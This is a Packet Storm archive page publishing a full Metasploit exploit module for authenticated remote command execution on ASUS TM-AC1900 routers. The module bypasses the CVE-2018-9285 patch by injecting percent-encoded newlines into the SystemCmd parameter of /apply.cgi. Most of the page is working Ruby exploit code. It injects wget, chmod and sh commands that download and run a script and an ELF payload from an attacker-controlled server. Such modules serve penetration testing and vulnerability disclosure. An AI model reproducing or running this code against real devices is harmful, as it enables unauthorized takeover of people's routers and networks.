what you don't know can hurt you

ASUS TM-AC1900 Arbitrary Command Execution

ASUS TM-AC1900 Arbitrary Command Execution
Posted Nov 13, 2020
Authored by b1ack0wl | Site metasploit.com

This Metasploit module exploits a code execution vulnerability within the ASUS TM-AC1900 router as an authenticated user. The vulnerability is due to a failure filter out percent encoded newline characters within the HTTP argument SystemCmd when invoking /apply.cgi which bypasses the patch for CVE-2018-9285.

tags | exploit, web, cgi, code execution
advisories | CVE-2018-9285
MD5 | 7d93c218049c0722da7e83b78f2c4623

ASUS TM-AC1900 Arbitrary Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'ASUS TM-AC1900 - Arbitrary Command Execution',
'Description' => %q{
This module exploits a code execution vulnerability within the ASUS
TM-AC1900 router as an authenicated user. The vulnerability is due to
a failure filter out percent encoded newline characters (%0a) within
the HTTP argument 'SystemCmd' when invoking "/apply.cgi" which bypasses
the patch for CVE-2018-9285.

},
'Author' =>
[
'b1ack0wl' # vuln discovery + exploit developer
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'References' =>
[
# CVE which shows that this functionality has been patched before ;)
['URL', 'https://www.cvedetails.com/cve/CVE-2018-9285/'],
['URL', 'https://github.com/b1ack0wl/OffensiveCon20/tree/master/TM-AC1900']
],
'Privileged' => true,
'Targets' =>
[
# this may work on other asus routers as well, but I've only tested this on the TM-AC1900.
[ 'ASUS TM-AC1900 <= v3.0.0.4.376_3199',
{}
]
],
'DisclosureDate' => 'April 18, 2020',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'Username for the web portal.', 'admin']),
OptString.new('PASSWORD', [true, 'Password for the web portal.', 'admin'])
])
end

def check_login
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => "/Main_Analysis_Content.asp",
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
})
if res and res.code == 200
# all good :)
return res
else
fail_with(Failure::NoAccess, 'Invalid password.')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Connection failed.')
end
end

def on_request_uri(cli, request)
if request.uri == '/'
# injected command has been executed
print_good("Sending bash script...")
@filename = rand_text_alpha(16)
bash_script = %Q|
#!/bin/sh
wget #{@lhost_srvport}/#{rand_text_alpha(16)} -O /tmp/#{@filename}
chmod +x /tmp/#{@filename}
/tmp/#{@filename} &
|
send_response(cli, bash_script)
else
# bash script has been executed. serve up the ELF file
exe_payload = generate_payload_exe()
print_good("Sending ELF file...")
send_response(cli, exe_payload)
# clean up
register_file_for_cleanup("/tmp/index.html")
register_file_for_cleanup("/tmp/#{@filename}")
end
end

def exploit
# make sure the supplied password is correct
check_login
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['LHOST']
else
srv_host = datastore['SRVHOST']
end
print_status("Exploiting #{target.name}...")
@lhost_srvport = "#{srv_host}:#{datastore['SRVPORT']}"
start_service({'Uri' => {'Proc' => Proc.new {
|cli, req| on_request_uri(cli, req)
},
'Path' => '/'
}})
begin
# store the cmd to be executed
cmd = "ping+-c+1+127.0.0.1;cd+..;cd+..;cd+tmp;rm+index.html;"
cmd << "wget+#{@lhost_srvport};chmod+777+index.html;sh+index.html"
res = send_request_cgi({
'method' => 'GET',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
# spaces need to be '+' and not %20, so cheap hack.exe it is.
# required HTTP args: SystemCmd, action_mode, and current_page
'uri' => "/apply.cgi?SystemCmd=#{cmd.gsub(';',"%0a")}&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp"
})
# now trigger it via check_login
res = check_login
if res and res.code == 200
print_status("Waiting up to 10 seconds for the payload to execute...")
select(nil, nil, nil, 10)
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close